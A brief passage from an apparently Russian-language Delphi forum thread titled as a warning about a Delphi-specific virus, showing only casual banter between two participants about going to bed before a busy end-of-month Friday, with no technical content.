Напрягите мыслительную мышцу.

--
Regards, LVT.

> Leonid Troyanovsky (27.08.2009 22:16:30) [90]

Нафиг ты голову ерундой забиваешь?

> Anatoly Podgoretsky © (27.08.09 22:36) [91]

> Нафиг ты голову ерундой забиваешь?

А то и верно.
Пойду-ка я, Анатолий, спать, бо тяжелый день завтра -
концемесячная тяпница.

--
Regards, LVT.

Осторожно! Новый вирус, специфичный для Delphi Найти похожие ветки